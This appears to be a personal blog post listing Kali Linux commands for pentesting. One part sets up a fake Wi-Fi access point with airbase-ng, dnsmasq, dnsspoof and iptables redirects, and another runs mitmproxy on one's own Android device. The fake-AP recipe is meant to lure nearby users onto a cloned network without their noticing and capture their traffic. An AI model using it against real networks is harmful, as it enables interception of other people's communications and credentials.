Hacking

A handful of useful commands about hacking

🕒 4 min read

Category: Linux

Tags: hacking, kali, security, android, mitm, linux

This brief article solely contains a few lines of commands, to perform pentesting or network monitoring. It's basically something I might use in the future on my networks or apps, so I'm writing it down as a reminder. I thought it may help other people that's why I decided to put it online. Of course the preferred operating system is Kali (or any Debian-based distro).

WARNING: only for use on your own networks and devices, the law strictly forbids it otherwise.

Fake AP (access point)

This technique is about creating a fake access point, similar to one already existing, so that people's computers will try to connect to your fake AP automatically, without them noticing.

  1. Deactivate any firewall first
  2. Get super user rights

    sudo su
    
  3. Install some required packages if not already present

    aptitude install dnsmasq aircrack-ng
    
  4. List the existing network interfaces and turn one of them into monitor mode

    airmon-ng
    airmon-ng start wlan0 # wlan0 is usually Wifi
    
  5. Start monitoring available networks around, and make a quick test

    airodump-ng mon0
    aireplay-ng --test mon0 # Test
    
  6. Choose one network and fake it

    airbase-ng --essid 'HG655D-1BFF19' -c 7 -W 1 -Z 2 -v mon0 # Fake WPA AP
    
  7. Enable packet forwarding

    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
    
  8. Write what follows in /etc/dnsmasq.conf:

    interface=at0
    dhcp-range=192.168.0.50,192.168.0.150,12h
    
  9. Do some other things for which I can't recall the usefulness right now (but I promise to update the article as soon as I do):

    ifconfig at0 192.168.0.1 up
    dnsmasq # pkill dnsmasq if needed
    
  10. Write what follows in /tmp/tests.conf (<tab> means you have to hit the tab key):

    192.168.0.1<tab>*
    
  11. Run dnsspoof:

    dnsspoof -i wlan0 -f /tmp/tests.conf
    
  12. Finally, start a webserver (Apache or using Python, or whatever)

    python3 -m http.server 8080
    

And you're good! All the clear traffic will pop up right in front of your eyes. To deal with HTTPS connections, have a look at SSLstrip.

Encountering problems with DNSspoof? Have a look there.

More information about faking APs.

Another interesting tutorial ("Kali Linux Evil Wireless Access Point").

MITM

This is a commonly used technique to "put yourself" between a target user and an access point, in order to see all the traffic this user might send and receive.

MITM on Android

On Android, it has the advantage of allowing you to monitor your outcoming traffic, which is useful when debugging your own apps.

  1. Grant yourself super user rights and enable packet forwarding on the right interface (here eth0 which is the Ethernet connection):

    sudo su
    sysctl -w net.ipv4.ip_forward=1
    iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
    iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
    
  2. Install the required dependencies and mitmproxy:

    apt-get install python-pip python-dev libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev zlib1g-dev
    easy_install mitmproxy
    

    You can as well download mitmproxy and install it manually.

  3. Run it:

    mitmproxy -T --no-upstream-cert --host [-p 8080] # -p is optional as 8080 is the default port
    

    The argument -T is for transparent. If you don't go for transparent, then the 3 lines about packet forwarding (point 1.) are useless (or maybe not, I can't remember).

  4. On your Android device:

    1. Open the current Wifi settings (long-press on the connected network).
      • If you decided to do transparent proxying (see above), set proxy to your computer's IP and port 8080, like: 192.168.1.2:8080
      • If you decided not to do transparent proxying (see above), don't set the proxy and instead set the IP to be static rather than using DHCP. Then write your computer's IP as the gateway.
    2. Go to the website mitm.it and click on the Android icon to install the certificate. If this doesn't work (website unreachable), push the certificate manually from your computer (run the following command from your computer):
      adb push ~/.mitmproxy/mitmproxy-ca-cert.cer /sdcard/Download
      

Then you'll see the traffic in your terminal going through!

This part has been inspired from this article.

Other tools

Other related topics